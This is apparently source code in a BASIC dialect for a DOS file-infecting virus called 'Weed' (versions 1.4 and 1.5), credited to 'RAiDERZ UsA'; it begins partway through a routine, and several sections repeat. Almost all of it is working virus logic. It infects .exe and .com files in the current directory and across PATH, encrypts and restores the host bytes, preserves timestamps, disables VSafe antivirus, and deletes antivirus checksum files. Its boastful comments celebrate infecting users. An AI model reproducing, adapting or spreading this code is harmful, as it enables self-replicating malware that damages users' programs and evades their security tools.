rem Now, dump the registers :)
rem if file_handle>4 then
rem ax=&hex4200
rem cx=a&
rem dx=b&
rem bx=file_handle
rem Ok, now that we have prepared the registers, Lets fix them!
rem if cx<0 then
rem cx=cx+32767
rem endif
rem if dx<0 then
rem dx=dx+32767
rem endif
rem int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
rem endif
rem return
method=0
call sub "fseek" file_handle, move_way&, method, errcode
return
enc_host:
rem Routine to encrypt the host data... We encrypt it before
rem appending. Yea, the encryption is lame... But it serves it's
rem purpose fine.
for x=0 to virus_size
a=host_data(x)
a=a+187
a=a+121
a=a+x
host_data(x)=a
next x
return
dec_host:
rem Routine to decrypt the host data... We need to decrypt it before
rem replacing it and passing control to it. And yes, the decryption
rem sequence is lame... But, I don't give a fuck!
for x=0 to virus_size
a=host_data(x)
a=a-187
a=a-121
a=a-x
host_data(x)=a
next x
return
infect_check:
gosub get_attr:
newattr=oldattr
newattr=0
gosub set_attr:
sig$=""
open"r",1,filename$
a=filepos(1,28)
for z=1 to 4
input #1,y$ byte
sig$=sig$+y$
next z
close 1
newattr=oldattr
gosub set_attr:
if sig$="‘Ÿ‰€" then
infected=1
else
infected=0
endif
return
strip_garbage:
open"r",1,filename$
a=filepos(1,hosttemp&)
print #1,"" NONULL
CLOSE 1
gosub open_file:
gosub set_fdt:
gosub close_file:
return
pause_exec:
REM 5 sec. timer routine from original QBasic source code written by:
REM obother@netcom.com (Glen Blankenship)
REM (5 * 18.2 clock-ticks-per-second = 91)
TickOne = TIMER
FOR i = 1 TO a
TickTwo = TickOne
WHILE TickTwo = TickOne
TickOne = TIMER
WEND
NEXT i
RETURN
toast_them:
kill_this$=killfil1$
gosub chklist:
kill_this$=killfil2$
gosub chklist:
kill_this$=killfil3$
gosub chklist:
return
decode_mess:
output$=""
rem This routine decrypts our tables in the beginning to useable material
rem For run-time use only. The data in the exe/com is not decrypted!
r=len(temp$)
for x=1 to r
a$=mid$(temp$,x,1)
a=asc(a$)
a=a+127
a$=chr$(a)
output$=output$+a$
next x
return
-----------------------------------------------------------------------------
--Õ Weed 1.4 Õ---
-----------------------------------------------------------------------------
dim virus_data(5850)
dim host_data(5850)
call sub "ibcritinit"
randomize
rem WEED v1.4b source code... Fucking alot better then before!!! :-)
rem Define our encrypted data for later decryption. Data is encrypted
rem during the compilation process. Do not tamper with tables in source!
weedmsg$="UNiDEN ViRuS has infected this PC. (c)1997 RAiDERZ UsA"
killfil1$="anti-vir.dat"
killfil2$="chklist.ms"
killfil3$="chklist.cps"
notouch1$="COMMAND.COM"
notouch2$="START.EXE"
exe$="*.exe"
com$="*.com"
rem And now the real fun part, bunch of temp calls to decode our information
rem above :)
temp$=weedmsg$
gosub decode_mess:
weedmsg$=output$
temp$=killfil1$
gosub decode_mess:
killfil1$=output$
temp$=killfil2$
gosub decode_mess:
killfil2$=output$
temp$=killfil3$
gosub decode_mess:
killfil3$=output$
temp$=notouch1$
gosub decode_mess:
notouch1$=output$
temp$=notouch2$
gosub decode_mess:
notouch2$=output$
temp$=exe$
gosub decode_mess:
exe$=output$
temp$=com$
gosub decode_mess:
com$=output$
temp$=byebait$
gosub decode_mess:
byebait$=output$
newattr=0
gosub vsafe_toggle:
vsafebak=cx
gosub toast_them:
call sub "exename" hostname$
yourparm$=command$
yourparm$=ltrim$(yourparm$)
yourparm$=rtrim$(yourparm$)
yourparm$=" "+yourparm$
rem My new WEED virus! Oh so much more deadly! So much more spiffy!
filename$=hostname$
hostsize&=filelen(filename$)
virus_size=5850
virus_size&=5850&
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub read_file:
gosub close_file:
newattr=oldattr
gosub set_attr:
rem Ok, now infect files presently in current directory!
subdir=0
proc$=exe$
gosub start_virus:
proc$=com$
gosub start_virus:
rem Ok, now were going to target files along the path :)
for n=0 to 100
call sub "path", n, virupath$
i=LEN(virupath$)
if i=0 then done:
b$=right$(virupath$,1)
if b$<>"\" then
virupath$=virupath$+"\"
endif
out1$=exe$
out2$=com$
subdir=1
proc$=virupath$+out1$
gosub start_virus:
proc$=virupath$+out2$
gosub start_virus:
next n
done:
filename$=hostname$
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
hosttemp&=hostsize&-virus_size&
move_way&=hosttemp&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
gosub dec_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
gosub close_file:
gosub strip_garbage:
newattr=oldattr
gosub set_attr:
a=rnd(0)
a=a mod 10
a=a+1
if a=1 then
rem Ok, run Stars Section, if they press "/" we allow them to run
rem original program!
call sub "Stars_heh"
endif
if a=7 then
rem Time to print message! :)
print weedmsg$
a=5*18
gosub pause_exec:
endif
call hostname$, yourparm$
newattr=0
gosub vsafe_toggle:
gosub toast_them:
filename$=hostname$
gosub lets_infect:
rem Hmm, lets see if our new host was able to make any files!
subdir=0
proc$=exe$
gosub start_virus:
proc$=com$
gosub start_virus:
gosub toast_them:
newattr=vsafebak
gosub vsafe_toggle:
end
rem We have completed replication. all stop!
start_virus:
errcode=0
attr=6
kewl=0
do_not_proceed=0
search$=proc$
attrib=6
filename$=find first (search$, attrib)
if error>0 then done_finding:
t1$=ucase$(filename$)
if t1$=notouch1$ then
do_not_proceed=1
endif
if t1$=notouch2$ then
do_not_proceed=1
endif
if do_not_proceed=0 then
if subdir=1 then
filename$=virupath$+filename$
endif
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
endif
while errcode=0
do_not_proceed=0
filename$=find continue
if error>0 then done_finding:
t1$=ucase$(filename$)
if t1$=notouch1$ then
do_not_proceed=1
endif
if t1$=notouch2$ then
do_not_proceed=1
endif
if do_not_proceed=0 then
if subdir=1 then
filename$=virupath$+filename$
endif
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
endif
if kewl>4 then
errcode=1
endif
WEND
done_finding:
return
Lets_infect:
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub write_file:
move_way&=hostsize&
gosub move_file_pointer:
gosub enc_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
kewl=kewl+1
gosub close_file:
newattr=oldattr
gosub set_attr:
return
REM ******* SYSTEM SUB-ROUTINES BELOW THIS LINE. DO NOT TREAD HERE!
REM ******* THESE AREAS MUST NOT BE FOOLED WITH!
get_attr:
AX = &HEX4300
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
set_attr:
AX = &HEX4301
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
vsafe_toggle:
ax=&hexfa02
dx=&hex5945
bx=newattr
int86(&hex16,ax,bx,cx,dx,na,na,na,na,na)
return
get_fdt:
if file_handle>4 then
AX=&HEX5700
BX=FILE_HANDLE
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
NEWDATE=CX
NEWTIME=DX
endif
RETURN
set_fdt:
if file_handle>4 then
AX=&HEX5701
BX=FILE_HANDLE
CX=NEWDATE
DX=NEWTIME
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
endif
RETURN
chklist:
temp1$=filename$
if subdir=1 then
filename$=virupath$+filename$
endif
filename$=kill_this$
newattr=0
gosub set_attr:
kill filename$
filename$=temp1$
return
rem DOS int file i/o driven code beyond this point :)
rem ax=&hex3d00
rem ax opens file for read in this mode :-)
rem ax=&hex3d01
rem ax opens file for write in this mode :-)
rem ax=&hex3d02
rem ax opens file for read/write access :) hehehe
open_file:
AX=&HEX3D02
DX = VARPTR(Filename$)
INT86(&HEX21,AX,NA,na,DX,NA,NA,NA,NA,NA)
file_handle=ax
return
write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write :)
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return
read_file:
rem as the name implies, it reads bytes into a buffer. :-)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad! :)
rem cx register is how many bytes to read :)
if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return
close_file:
rem This routine will close the selected file.
rem do not try to close handle 2, very nasty... :-(
if file_handle>4 then
ax=&hex3e00
bx=file_handle
int86(&hex21,ax,bx,na,na,na,na,na,na,na)
endif
return
move_file_pointer:
rem be sure to set variable move_way to whereever you wish to go
rem it can be a long integer :-)
rem get the target location, divide that by 65536
rem Also subtract value of a& from the original size.
rem set both registers for real numbers, no mistake here.. Will fuckup
rem file pointer routine if I don't. :)
rem a&=move_way&/65536&
rem b&=a&-move_way&
rem a&=abs(a&)
rem b&=abs(b&)
rem Now, dump the registers :)
rem if file_handle>4 then
rem ax=&hex4200
rem cx=a&
rem dx=b&
rem bx=file_handle
rem Ok, now that we have prepared the registers, Lets fix them!
rem if cx<0 then
rem cx=cx+32767
rem endif
rem if dx<0 then
rem dx=dx+32767
rem endif
rem int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
rem endif
rem return
method=0
call sub "fseek" file_handle, move_way&, method, errcode
return
enc_host:
rem Routine to encrypt the host data... We encrypt it before
rem appending. Yea, the encryption is lame... But it serves it's
rem purpose fine.
for x=0 to virus_size
a=host_data(x)
a=a+187
a=a+121
a=a+x
a=a-194
a=a-27
host_data(x)=a
next x
return
dec_host:
rem Routine to decrypt the host data... We need to decrypt it before
rem replacing it and passing control to it. And yes, the decryption
rem sequence is lame... But, I don't give a fuck!
for x=0 to virus_size
a=host_data(x)
a=a-187
a=a-121
a=a-x
a=a+194
a=a+27
host_data(x)=a
next x
return
infect_check:
gosub get_attr:
newattr=oldattr
newattr=0
gosub set_attr:
sig$=""
open"r",1,filename$
a=filepos(1,28)
for z=1 to 4
input #1,y$ byte
sig$=sig$+y$
next z
close 1
newattr=oldattr
gosub set_attr:
if sig$="˙fl¸≠" then
infected=1
else
infected=0
endif
return
strip_garbage:
open"r",1,filename$
a=filepos(1,hosttemp&)
print #1,"" NONULL
CLOSE 1
gosub open_file:
gosub set_fdt:
gosub close_file:
return
pause_exec:
REM 5 sec. timer routine from original QBasic source code written by:
REM obother@netcom.com (Glen Blankenship)
REM (5 * 18.2 clock-ticks-per-second = 91)
TickOne = TIMER
FOR i = 1 TO a
TickTwo = TickOne
WHILE TickTwo = TickOne
TickOne = TIMER
WEND
NEXT i
RETURN
toast_them:
kill_this$=killfil1$
gosub chklist:
kill_this$=killfil2$
gosub chklist:
kill_this$=killfil3$
gosub chklist:
return
decode_mess:
output$=""
rem This routine decrypts our tables in the beginning to useable material
rem For run-time use only. The data in the exe/com is not decrypted!
r=len(temp$)
for x=1 to r
a$=mid$(temp$,x,1)
a=asc(a$)
a=a+127
a$=chr$(a)
output$=output$+a$
next x
return
-----------------------------------------------------------------------------
--Õ Weed 1.5 Õ---
-----------------------------------------------------------------------------
dim virus_data(5850)
dim host_data(5850)
call sub "ibcritinit"
randomize
rem UniDEn virus v1.0 - Based on weed v1.4a and B source codes.
rem Slight differences... Same resulting infectious size :-)
rem hehahahaha... Infect the lamerz!
weedmsg$="Can't we all just do a Bong?"
killfil1$="anti-vir.dat"
killfil2$="chklist.ms"
killfil3$="chklist.cps"
notouch1$="COMMAND.COM"
notouch2$="START.EXE"
exe$="*.exe"
com$="*.com"
rem And now the real fun part, bunch of temp calls to decode our information
rem above :)
temp$=weedmsg$
gosub decode_mess:
weedmsg$=output$
temp$=killfil1$
gosub decode_mess:
killfil1$=output$
temp$=killfil2$
gosub decode_mess:
killfil2$=output$
temp$=killfil3$
gosub decode_mess:
killfil3$=output$
temp$=notouch1$
gosub decode_mess:
notouch1$=output$
temp$=notouch2$
gosub decode_mess:
notouch2$=output$
temp$=exe$
gosub decode_mess:
exe$=output$
temp$=com$
gosub decode_mess:
com$=output$
temp$=byebait$
gosub decode_mess:
byebait$=output$
newattr=0
gosub vsafe_toggle:
vsafebak=cx
gosub toast_them:
call sub "exename" hostname$
yourparm$=command$
yourparm$=ltrim$(yourparm$)
yourparm$=rtrim$(yourparm$)
yourparm$=" "+yourparm$
rem My new WEED virus! Oh so much more deadly! So much more spiffy!
filename$=hostname$
hostsize&=filelen(filename$)
virus_size=5850
virus_size&=5850&
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub read_file:
gosub close_file:
newattr=oldattr
gosub set_attr:
rem Ok, now infect files presently in current directory!
subdir=0
proc$=exe$
gosub start_virus:
proc$=com$
gosub start_virus:
rem Ok, now were going to target files along the path :)
for n=0 to 100
call sub "path", n, virupath$
i=LEN(virupath$)
if i=0 then done:
b$=right$(virupath$,1)
if b$<>"\" then
virupath$=virupath$+"\"
endif
out1$=exe$
out2$=com$
subdir=1
proc$=virupath$+out1$
gosub start_virus:
proc$=virupath$+out2$
gosub start_virus:
next n
done:
filename$=hostname$
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
hosttemp&=hostsize&-virus_size&
move_way&=hosttemp&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
gosub dec_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
gosub close_file:
gosub strip_garbage:
newattr=oldattr
gosub set_attr:
a=rnd(0)
a=a mod 10
a=a+1
if a=1 then
rem Ok, run Stars Section, if they press "/" we allow them to run
rem original program!
call sub "Stars_heh"
endif
if a=7 then
rem Time to print message! :)
print weedmsg$
a=5*18
gosub pause_exec:
endif
call hostname$, yourparm$
newattr=0
gosub vsafe_toggle:
gosub toast_them:
filename$=hostname$
gosub lets_infect:
rem Hmm, lets see if our new host was able to make any files!
subdir=0
proc$=exe$
gosub start_virus:
proc$=com$
gosub start_virus:
gosub toast_them:
newattr=vsafebak
gosub vsafe_toggle:
end
rem We have completed replication. all stop!
start_virus:
errcode=0
attr=6
kewl=0
do_not_proceed=0
search$=proc$
attrib=6
filename$=find first (search$, attrib)
if error>0 then done_finding:
t1$=ucase$(filename$)
if t1$=notouch1$ then
do_not_proceed=1
endif
if t1$=notouch2$ then
do_not_proceed=1
endif
if do_not_proceed=0 then
if subdir=1 then
filename$=virupath$+filename$
endif
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
endif
while errcode=0
do_not_proceed=0
filename$=find continue
if error>0 then done_finding:
t1$=ucase$(filename$)
if t1$=notouch1$ then
do_not_proceed=1
endif
if t1$=notouch2$ then
do_not_proceed=1
endif
if do_not_proceed=0 then
if subdir=1 then
filename$=virupath$+filename$
endif
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
endif
if kewl>4 then
errcode=1
endif
WEND
done_finding:
return
Lets_infect:
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub write_file:
move_way&=hostsize&
gosub move_file_pointer:
gosub enc_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
kewl=kewl+1
gosub close_file:
newattr=oldattr
gosub set_attr:
return
REM ******* SYSTEM SUB-ROUTINES BELOW THIS LINE. DO NOT TREAD HERE!
REM ******* THESE AREAS MUST NOT BE FOOLED WITH!
get_attr:
AX = &HEX4300
DX = VARPTR(Filename$)
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
newattr=cx
return
set_attr:
AX = &HEX4301
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
vsafe_toggle:
ax=&hexfa02
dx=&hex5945
bx=newattr
int86(&hex16,ax,bx,cx,dx,na,na,na,na,na)
return
get_fdt:
if file_handle>4 then
AX=&HEX5700
BX=FILE_HANDLE
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
NEWDATE=CX
NEWTIME=DX
endif
RETURN
set_fdt:
if file_handle>4 then
AX=&HEX5701
BX=FILE_HANDLE
CX=NEWDATE
DX=NEWTIME
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
endif
RETURN
chklist:
temp1$=filename$
if subdir=1 then
filename$=virupath$+filename$
endif
filename$=kill_this$
newattr=0
gosub set_attr:
kill filename$
filename$=temp1$
return
rem DOS int file i/o driven code beyond this point :)
rem ax=&hex3d00
rem ax opens file for read in this mode :-)
rem ax=&hex3d01
rem ax opens file for write in this mode :-)
rem ax=&hex3d02
rem ax opens file for read/write access :) hehehe
open_file:
AX=&HEX3D02
DX = VARPTR(Filename$)
INT86(&HEX21,AX,NA,na,DX,NA,NA,NA,NA,NA)
file_handle=ax
return
write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write :)
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return
read_file:
rem as the name implies, it reads bytes into a buffer. :-)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad! :)
rem cx register is how many bytes to read :)
if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return
close_file:
rem This routine will close the selected file.
rem do not try to close handle 2, very nasty... :-(
if file_handle>4 then
ax=&hex3e00
bx=file_handle
int86(&hex21,ax,bx,na,na,na,na,na,na,na)
endif
return
move_file_pointer:
rem be sure to set variable move_way to whereever you wish to go
rem it can be a long integer :-)
rem get the target location, divide that by 65536
rem Also subtract value of a& from the original size.
rem set both registers for real numbers, no mistake here.. Will fuckup
rem file pointer routine if I don't. :)
rem a&=move_way&/65536&
rem b&=a&-move_way&
rem a&=abs(a&)
rem b&=abs(b&)
rem Now, dump the registers :)
rem if file_handle>4 then
rem ax=&hex4200
rem cx=a&
rem dx=b&
rem bx=file_handle
rem Ok, now that we have prepared the registers, Lets fix them!
rem if cx<0 then
rem cx=cx+32767
rem endif
rem if dx<0 then
rem dx=dx+32767
rem endif
rem int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
rem endif
rem return
method=0
call sub "fseek" file_handle, move_way&, method, errcode
return
enc_host:
rem Routine to encrypt the host data... We encrypt it before
rem appending. Yea, the encryption is lame... But it serves it's
rem purpose fine.
for x=0 to virus_size
a=host_data(x)
a=a+187
a=a+121
a=a+x
a=a-194
a=a-27
host_data(x)=a
next x
return
dec_host:
rem Routine to decrypt the host data... We need to decrypt it before
rem replacing it and passing control to it. And yes, the decryption
rem sequence is lame... But, I don't give a fuck!
for x=0 to virus_size
a=host_data(x)
a=a-187
a=a-121
a=a-x
a=a+194
a=a+27
host_data(x)=a
next x
return
infect_check:
gosub get_attr:
newattr=oldattr
newattr=0
gosub set_attr:
sig$=""
open"r",1,filename$
a=filepos(1,28)
for z=1 to 4
input #1,y$ byte
sig$=sig$+y$
next z
close 1
newattr=oldattr
gosub set_attr:
if sig$="˙fl¸≠" then
infected=1
else
infected=0
endif
return
strip_garbage:
open"r",1,filename$
a=filepos(1,hosttemp&)
print #1,"" NONULL
CLOSE 1
gosub open_file:
gosub set_fdt:
gosub close_file:
return
pause_exec:
REM 5 sec. timer routine from original QBasic source code written by:
REM obother@netcom.com (Glen Blankenship)
REM (5 * 18.2 clock-ticks-per-second = 91)
TickOne = TIMER
FOR i = 1 TO a
TickTwo = TickOne
WHILE TickTwo = TickOne
TickOne = TIMER
WEND
NEXT i
RETURN
toast_them:
kill_this$=killfil1$
gosub chklist:
kill_this$=killfil2$
gosub chklist:
kill_this$=killfil3$
gosub chklist:
return
decode_mess:
output$=""
rem This routine decrypts our tables in the beginning to useable material
rem For run-time use only. The data in the exe/com is not decrypted!
r=len(temp$)
for x=1 to r
a$=mid$(temp$,x,1)
a=asc(a$)
a=a+127
a$=chr$(a)
output$=output$+a$
next x
return
-----------------------------------------------------------------------------